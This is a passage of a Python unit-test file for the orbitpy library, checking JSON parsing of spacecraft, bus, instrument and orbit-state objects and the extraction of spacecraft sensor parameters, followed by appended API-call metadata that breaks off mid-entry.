self.assertNotEqual(o1, o2)
# Equivalent orientation specifications in different input format
o1 = SpacecraftBus.from_json('{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", \
"convention": "REF_FRAME_ALIGNED"}, "@id":123}')
o2 = SpacecraftBus.from_json('{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", \
"convention": "XYZ","xRotation":0,"yRotation":0,"zRotation":0}, "@id":123}')
self.assertEqual(o1, o2)
class TestSpacecraft(unittest.TestCase):
def test_from_json(self):
spc1 = Spacecraft.from_json(spc1_json)
spc2 = Spacecraft.from_json(spc2_json)
spc3 = Spacecraft.from_json(spc3_json)
# typical case 1 instrument
self.assertEqual(spc1.name, "Mars")
self.assertEqual(spc1.spacecraftBus, SpacecraftBus.from_json('{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} \
}'))
self.assertEqual(spc1.instrument, [Instrument.from_json('{"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, \
"fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, \
"maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, \
"numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}')])
self.assertEqual(spc1.orbitState, OrbitState.from_json('{"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25}}'))
self.assertEqual(spc1._id, "sp1")
# no instruments
self.assertEqual(spc2.name, "Jupyter")
self.assertEqual(spc2.spacecraftBus, SpacecraftBus.from_json('{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} \
}'))
self.assertIsNone(spc2.instrument)
self.assertEqual(spc2.orbitState, OrbitState.from_json('{"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25}}'))
self.assertEqual(spc2._id, 12)
# 3 instruments with multiple modes, no spacecraft id assignment
self.assertEqual(spc3.name, "Saturn")
self.assertEqual(spc3.spacecraftBus, SpacecraftBus.from_json('{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} \
}'))
self.assertEqual(len(spc3.instrument), 3)
# 1st instrument
self.assertEqual(spc3.instrument[0].get_id(), 'bs1')
self.assertEqual(spc3.instrument[0].get_mode_id()[0], '0')
# 2nd instrument
self.assertIsNotNone(spc3.instrument[1].get_id())
        self.assertIsNotNone(spc3.instrument[1].get_mode_id()[0])
# 3rd instrument
self.assertEqual(spc3.instrument[2].get_id(), 'bs3')
self.assertEqual(spc3.instrument[2].get_mode_id()[0], 0)
self.assertEqual(spc3.instrument[2].get_mode_id()[1], 1)
self.assertIsNotNone(spc3.instrument[2].get_mode_id()[2])
self.assertEqual(spc3.orbitState, OrbitState.from_json('{"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25}}'))
self.assertIsNotNone(spc3._id)
def test_get_instrument(self):
spc1 = Spacecraft.from_json(spc1_json)
spc2 = Spacecraft.from_json(spc2_json)
spc3 = Spacecraft.from_json(spc3_json)
# spc1 has 1 instrument with id 'bs1'
self.assertEqual(spc1.get_instrument(sensor_id='bs1'), spc1.instrument[0])
self.assertEqual(spc1.get_instrument(), spc1.instrument[0]) # no sensor_id specification
self.assertIsNone(spc1.get_instrument('bs2')) # wrong sensor_id
# spc2 has no instruments
self.assertIsNone(spc2.get_instrument())
# spc3 has three instruments
self.assertEqual(spc3.get_instrument(sensor_id='bs1'), spc3.instrument[0])
self.assertEqual(spc3.get_instrument(), spc3.instrument[0])
self.assertEqual(spc3.get_instrument(sensor_id='bs3'), spc3.instrument[2])
def test_add_instrument(self): #TODO
pass
def test_add_to_list(self): #TODO
pass
def test_get_id(self): #TODO
pass
def test_to_dict(self): #TODO
pass
'''
def test___eq__(self):
o1 = Spacecraft.from_json('{"@id": "sp1", "name": "Spock", \
"spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} \
}, \
"instrument": {"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, \
"fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, \
"maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, \
"numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}, \
"orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} \
} \
}')
o2 = Spacecraft.from_json('{"@id": "sp1", "name": "Spock", \
"spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} \
}, \
"instrument": {"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, \
"fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, \
"maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, \
"numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}, \
"orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} \
} \
}')
self.assertEqual(o1, o2)
# spacecraft bus different (orientation)
o2 = Spacecraft.from_json('{"@id": "sp1", "name": "Spock", \
"spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame":"Nadir_pointing", "convention": "SIDE_LOOK", "sideLookAngle":-1} \
}, \
"instrument": {"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, \
"fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, \
"maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, \
"numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}, \
"orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} \
} \
}')
self.assertNotEqual(o1, o2)
# instrument different (fieldOfViewGeometry)
o2 = Spacecraft.from_json('{"@id": "sp1", "name": "Spock", \
"spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame":"Nadir_pointing", "convention": "SIDE_LOOK", "sideLookAngle":-1} \
}, \
"instrument": {"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, \
"fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":15 }, \
"maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, \
"numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}, \
"orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} \
} \
}')
self.assertNotEqual(o1, o2)
# orbitState different (date)
o2 = Spacecraft.from_json('{"@id": "sp1", "name": "Spock", \
"spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame":"Nadir_pointing", "convention": "SIDE_LOOK", "sideLookAngle":-1} \
}, \
"instrument": {"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, \
"fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":15 }, \
"maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, \
"numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}, \
"orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":3, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} \
} \
}')
self.assertNotEqual(o1, o2)
'''
class TestUtilModuleFunction(unittest.TestCase):
def test_helper_extract_spacecraft_params(self):
# 1 instrument, 1 mode
o1 = Spacecraft.from_json('{"@id": "sp1", "name": "Mars", \
"spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} \
}, \
"instrument": {"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, \
"fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, \
"maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, \
"numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}, \
"orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} \
} \
}')
# no instruments
o2 = Spacecraft.from_json('{"@id": 12, "name": "Jupyter", \
"spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} \
}, \
"orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} \
} \
}')
# 3 instruments with multiple modes, no spacecraft id assignment
o3 = Spacecraft.from_json('{"name": "Saturn", \
"spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, \
"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} \
}, \
"instrument": [ \
{ "name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, \
"fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, \
"maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, \
"numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor" \
}, \
{ "name": "Beta", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, \
"maneuver":{"maneuverType": "SINGLE_ROLL_ONLY", "A_rollMin":10, "A_rollMax":15}, \
"mode": [{"@id":101, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}} \
], \
"numberDetectorRows":5, "numberDetectorCols":10, "@type":"Basic Sensor" \
}, \
{ "name": "Gamma", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, \
"fieldOfViewGeometry": {"shape": "RECTANGULAR", "angleHeight":5, "angleWidth":10 }, \
"maneuver":{"maneuverType": "Double_Roll_Only", "A_rollMin":10, "A_rollMax":15, "B_rollMin":-15, "B_rollMax":-10}, \
"mode": [{"@id":0, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}}, \
{"@id":1, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "SIDE_LOOK", "sideLookAngle": 25}}, \
{ "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "SIDE_LOOK", "sideLookAngle": -25}} \
], \
"numberDetectorRows":5, "numberDetectorCols":10, "@id": "bs3", "@type":"Basic Sensor" \
} \
], \
"orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, \
"state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} \
} \
}')
# single sc tests
x = orbitpy.util.helper_extract_spacecraft_params([o1])
self.assertEqual(len(x), 1)
self.assertEqual(x[0].sc_id, 'sp1')
self.assertEqual(x[0].instru_id,'bs1')
self.assertEqual(x[0].mode_id, '0')
self.assertAlmostEqual(x[0].sma, 6878.136999999998)
self.assertAlmostEqual(x[0].fov_height, 5.0)
        self.assertAlmostEqual(x[0].fov_width, 5.0)
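        # The 15 deg field-of-regard below is consistent with the 5 deg circular FOV
        # expanded by the instrument's 10 deg CIRCULAR maneuver range.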
self.assertAlmostEqual(x[0].for_height, 15.0)
self.assertAlmostEqual(x[0].for_width, 15.0)
# spacecraft with no instruments
x = orbitpy.util.helper_extract_spacecraft_params([o2])
self.assertEqual(len(x), 1)
self.assertEqual(x[0].sc_id, 12)
self.assertIsNone(x[0].instru_id)
self.assertIsNone(x[0].mode_id)
self.assertAlmostEqual(x[0].sma, 6878.136999999998)
self.assertIsNone(x[0].fov_height)
        self.assertIsNone(x[0].fov_width)
self.assertIsNone(x[0].for_height)
self.assertIsNone(x[0].for_width)
x = orbitpy.util.helper_extract_spacecraft_params([o3])
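        # 8 entries expected: presumably one per (instrument, mode, field-of-regard) tuple --
        # Alpha contributes 1 mode, Beta 1 mode, and Gamma 3 modes whose DOUBLE_ROLL_ONLY
        # maneuver appears to yield two field-of-regard entries each (1 + 1 + 3*2 = 8).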
self.assertEqual(len(x), 8)
self.assertIsNotNone(x[0].sc_id)
self.assertIsNotNone(x[1].sc_id)
self.assertIsNotNone(x[2].sc_id)
self.assertIsNotNone(x[3].sc_id)
self.assertIsNotNone(x[4].sc_id)
self.assertIsNotNone(x[5].sc_id)
self.assertIsNotNone(x[6].sc_id)
self.assertIsNotNone(x[7].sc_id)
self.assertEqual(x[0].instru_id,'bs1')
self.assertIsNotNone(x[1].instru_id)
self.assertEqual(x[2].instru_id,'bs3')
self.assertEqual(x[3].instru_id,'bs3')
self.assertEqual(x[4].instru_id,'bs3')
self.assertEqual(x[5].instru_id,'bs3')
self.assertEqual(x[6].instru_id,'bs3')
self.assertEqual(x[7].instru_id,'bs3')
self.assertEqual(x[0].mode_id, '0')
self.assertEqual(x[1].mode_id, 101)
self.assertEqual(x[2].mode_id, 0)
self.assertEqual(x[3].mode_id, 0)
self.assertEqual(x[4].mode_id, 1)
self.assertEqual(x[5].mode_id, 1)
self.assertIsNotNone(x[6].mode_id)
self.assertIsNotNone(x[7].mode_id)
self.assertAlmostEqual(x[0].sma, 6878.136999999998)
self.assertAlmostEqual(x[1].sma, 6878.136999999998)
self.assertAlmostEqual(x[2].sma, 6878.136999999998)
self.assertAlmostEqual(x[3].sma, 6878.136999999998)
self.assertAlmostEqual(x[4].sma, 6878.136999999998)
self.assertAlmostEqual(x[5].sma, 6878.136999999998)
self.assertAlmostEqual(x[6].sma, 6878.136999999998)
self.assertAlmostEqual(x[7].sma, 6878.136999999998)
self.assertAlmostEqual(x[0].fov_height, 5.0)
self.assertAlmostEqual(x[1].fov_height, 5.0)
self.assertAlmostEqual(x[2].fov_height, 5.0)
self.assertAlmostEqual(x[3].fov_height, 5.0)
self.assertAlmostEqual(x[4].fov_height, 5.0)
self.assertAlmostEqual(x[5].fov_height, 5.0)
self.assertAlmostEqual(x[6].fov_height, 5.0)
        self.assertAlmostEqual(x[0].fov_width, 5)
        self.assertAlmostEqual(x[1].fov_width, 5)
        self.assertAlmostEqual(x[2].fov_width, 10.0)
        self.assertAlmostEqual(x[3].fov_width, 10.0)
        self.assertAlmostEqual(x[4].fov_width, 10.0)
        self.assertAlmostEqual(x[5].fov_width, 10.0)
        self.assertAlmostEqual(x[6].fov_width, 10.0)
        self.assertAlmostEqual(x[7].fov_width, 10.0)
self.assertAlmostEqual(x[0].for_height, 15.0)
self.assertAlmostEqual(x[1].for_height, 5.0)
self.assertAlmostEqual(x[2].for_height, 5.0)
self.assertAlmostEqual(x[3].for_height, 5.0)
self.assertAlmostEqual(x[4].for_height, 5.0)
self.assertAlmostEqual(x[5].for_height, 5.0)
self.assertAlmostEqual(x[6].for_height, 5.0)
self.assertAlmostEqual(x[7].for_height, 5.0)
self.assertAlmostEqual(x[0].for_width, 15.0)
self.assertAlmostEqual(x[1].for_width, 10.0)
self.assertAlmostEqual(x[2].for_width, 15.0)
self.assertAlmostEqual(x[3].for_width, 15.0)
self.assertAlmostEqual(x[4].for_width, 15.0)
self.assertAlmostEqual(x[5].for_width, 15.0)
self.assertAlmostEqual(x[6].for_width, 15.0)
self.assertAlmostEqual(x[7].for_width, 15.0)
# test multiple spacecraft list, test first and last element of the resultant list
x = orbitpy.util.helper_extract_spacecraft_params([o1, o2, o3])
self.assertEqual(len(x), 10)
self.assertEqual(x[0].sc_id, 'sp1')
self.assertEqual(x[0].instru_id,'bs1')
self.assertEqual(x[0].mode_id, '0')
self.assertAlmostEqual(x[0].sma, 6878.136999999998)
self.assertAlmostEqual(x[0].fov_height, 5.0)
        self.assertAlmostEqual(x[0].fov_width, 5.0)
self.assertAlmostEqual(x[0].for_height, 15.0)
self.assertAlmostEqual(x[0].for_width, 15.0)
self.assertEqual(x[1].sc_id, 12)
self.assertIsNotNone(x[2].sc_id)
self.assertEqual(x[3].sc_id, x[2].sc_id)
self.assertEqual(x[4].sc_id, x[2].sc_id)
self.assertEqual(x[5].sc_id, x[2].sc_id)
self.assertEqual(x[6].sc_id, x[2].sc_id)
self.assertEqual(x[7].sc_id, x[2].sc_id)
self.assertEqual(x[8].sc_id, x[2].sc_id)
self.assertEqual(x[9].sc_id, x[2].sc_id)
self.assertEqual(x[9].instru_id,'bs3')
self.assertIsNotNone(x[9].mode_id)
self.assertAlmostEqual(x[9].sma, 6878.136999999998)
self.assertAlmostEqual(x[9].fov_height, 5.0)
        self.assertAlmostEqual(x[9].fov_width, 10.0)
self.assertAlmostEqual(x[9].for_height, 5.0)
self.assertAlmostEqual(x[9].for_width, 15.0)
def test_extract_auxillary_info_from_state_file(self): # TODO
pass
class TestGroundStation(unittest.TestCase): #TODO
pass
class TestUtilFunctions(unittest.TestCase):
def test_dictionary_list_to_object_list(self): #TODO
pass
def test_object_list_to_dictionary_list(self): #TODO
pass
def test_initialize_object_list(self): #TODO
pass
def test_add_to_list(self): #TODO
pass
class TestOutputInfoUtility(unittest.TestCase): #TODO
pass
|
[
"orbitpy.util.OrbitState.from_json",
"orbitpy.util.OrbitState.state_from_dict",
"propcov.Rvector6",
"numpy.deg2rad",
"orbitpy.util.SpacecraftBus.from_json",
"propcov.AbsoluteDate.fromJulianDate",
"instrupy.Instrument.from_json",
"orbitpy.util.OrbitState.date_from_dict",
"orbitpy.util.Spacecraft.from_json",
"instrupy.util.Orientation.from_dict",
"orbitpy.util.OrbitState.from_dict",
"propcov.AbsoluteDate.fromGregorianDate"
] |
[((442, 515), 'orbitpy.util.OrbitState.date_from_dict', 'OrbitState.date_from_dict', (["{'@type': 'JULIAN_DATE_UT1', 'jd': 2459270.75}"], {}), "({'@type': 'JULIAN_DATE_UT1', 'jd': 2459270.75})\n", (467, 515), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((582, 713), 'orbitpy.util.OrbitState.date_from_dict', 'OrbitState.date_from_dict', (["{'@type': 'GREGORIAN_UTC', 'year': 2021, 'month': 2, 'day': 25, 'hour': 6,\n 'minute': 0, 'second': 0}"], {}), "({'@type': 'GREGORIAN_UTC', 'year': 2021, 'month':\n 2, 'day': 25, 'hour': 6, 'minute': 0, 'second': 0})\n", (607, 713), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((839, 990), 'orbitpy.util.OrbitState.state_from_dict', 'OrbitState.state_from_dict', (["{'@type': 'KEPLERIAN_EARTH_CENTERED_INERTIAL', 'sma': 6867, 'ecc': 0.001,\n 'inc': 45, 'raan': 35, 'aop': 145, 'ta': -25}"], {}), "({'@type': 'KEPLERIAN_EARTH_CENTERED_INERTIAL',\n 'sma': 6867, 'ecc': 0.001, 'inc': 45, 'raan': 35, 'aop': 145, 'ta': -25})\n", (865, 990), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((1112, 1317), 'orbitpy.util.OrbitState.state_from_dict', 'OrbitState.state_from_dict', (["{'@type': 'CARTESIAN_EARTH_CENTERED_INERTIAL', 'x': cart_state[0], 'y':\n cart_state[1], 'z': cart_state[2], 'vx': cart_state[3], 'vy':\n cart_state[4], 'vz': cart_state[5]}"], {}), "({'@type': 'CARTESIAN_EARTH_CENTERED_INERTIAL',\n 'x': cart_state[0], 'y': cart_state[1], 'z': cart_state[2], 'vx':\n cart_state[3], 'vy': cart_state[4], 'vz': cart_state[5]})\n", (1138, 1317), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((1822, 2042), 'orbitpy.util.OrbitState.from_dict', 'OrbitState.from_dict', (["{'date': {'@type': 'JULIAN_DATE_UT1', 'jd': 2459270.75}, 'state': {'@type':\n 'CARTESIAN_EARTH_CENTERED_INERTIAL', 'x': 6878.137, 'y': 0, 'z': 0,\n 'vx': 0, 'vy': 7.6126, 'vz': 0}, '@id': 123}"], {}), "({'date': {'@type': 'JULIAN_DATE_UT1', 'jd': 2459270.75\n }, 'state': {'@type': 'CARTESIAN_EARTH_CENTERED_INERTIAL', 'x': \n 6878.137, 'y': 0, 'z': 0, 'vx': 0, 'vy': 7.6126, 'vz': 0}, '@id': 123})\n", (1842, 2042), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((2435, 2715), 'orbitpy.util.OrbitState.from_dict', 'OrbitState.from_dict', (["{'date': {'@type': 'GREGORIAN_UTC', 'year': 2021, 'month': 2, 'day': 25,\n 'hour': 6, 'minute': 0, 'second': 0}, 'state': {'@type':\n 'KEPLERIAN_EARTH_CENTERED_INERTIAL', 'sma': 6878.137, 'ecc': 0.001,\n 'inc': 45, 'raan': 35, 'aop': 145, 'ta': -25}}"], {}), "({'date': {'@type': 'GREGORIAN_UTC', 'year': 2021,\n 'month': 2, 'day': 25, 'hour': 6, 'minute': 0, 'second': 0}, 'state': {\n '@type': 'KEPLERIAN_EARTH_CENTERED_INERTIAL', 'sma': 6878.137, 'ecc': \n 0.001, 'inc': 45, 'raan': 35, 'aop': 145, 'ta': -25}})\n", (2455, 2715), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((3219, 3427), 'orbitpy.util.OrbitState.from_dict', 'OrbitState.from_dict', (["{'date': {'@type': 'JULIAN_DATE_UT1', 'jd': 2459270.75}, 'state': {'@type':\n 'CARTESIAN_EARTH_CENTERED_INERTIAL', 'x': 6878.137, 'y': 0, 'z': 0,\n 'vx': 0, 'vy': 7.6126, 'vz': 0}}"], {}), "({'date': {'@type': 'JULIAN_DATE_UT1', 'jd': 2459270.75\n }, 'state': {'@type': 'CARTESIAN_EARTH_CENTERED_INERTIAL', 'x': \n 6878.137, 'y': 0, 'z': 0, 'vx': 0, 'vy': 7.6126, 'vz': 0}})\n", (3239, 3427), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((4098, 4392), 'orbitpy.util.OrbitState.from_dict', 'OrbitState.from_dict', 
(["{'date': {'@type': 'GREGORIAN_UTC', 'year': 2021, 'month': 2, 'day': 25,\n 'hour': 6, 'minute': 0, 'second': 0}, 'state': {'@type':\n 'KEPLERIAN_EARTH_CENTERED_INERTIAL', 'sma': 6878.137, 'ecc': 0.001,\n 'inc': 45, 'raan': 35, 'aop': 145, 'ta': -25}, '@id': '123'}"], {}), "({'date': {'@type': 'GREGORIAN_UTC', 'year': 2021,\n 'month': 2, 'day': 25, 'hour': 6, 'minute': 0, 'second': 0}, 'state': {\n '@type': 'KEPLERIAN_EARTH_CENTERED_INERTIAL', 'sma': 6878.137, 'ecc': \n 0.001, 'inc': 45, 'raan': 35, 'aop': 145, 'ta': -25}, '@id': '123'})\n", (4118, 4392), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((5231, 5467), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}"""'], {}), '(\n \'{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}\'\n )\n', (5254, 5467), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((5865, 5938), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "Microsat", "mass": 100, "volume": 1}"""'], {}), '(\'{"name": "Microsat", "mass": 100, "volume": 1}\')\n', (5888, 5938), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((6319, 6467), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "SIDE_LOOK", "sideLookAngle":-10}, "@id":123}"""'], {}), '(\n \'{"orientation":{"referenceFrame": "NADIR_POINTING", "convention": "SIDE_LOOK", "sideLookAngle":-10}, "@id":123}\'\n )\n', (6342, 6467), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((6856, 7026), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"orientation":{"referenceFrame": "EARTH_CENTERED_INERTIAL", "convention": "XYZ","xRotation":10,"yRotation":-10.4,"zRotation":20.78}}"""'], {}), '(\n \'{"orientation":{"referenceFrame": "EARTH_CENTERED_INERTIAL", "convention": "XYZ","xRotation":10,"yRotation":-10.4,"zRotation":20.78}}\'\n )\n', (6879, 7026), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((7445, 7681), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}"""'], {}), '(\n \'{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}\'\n )\n', (7468, 7681), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((8500, 8736), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}"""'], {}), '(\n \'{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}\'\n )\n', (8523, 8736), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((8742, 8980), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "BlueCanyon", "mass": 20, 
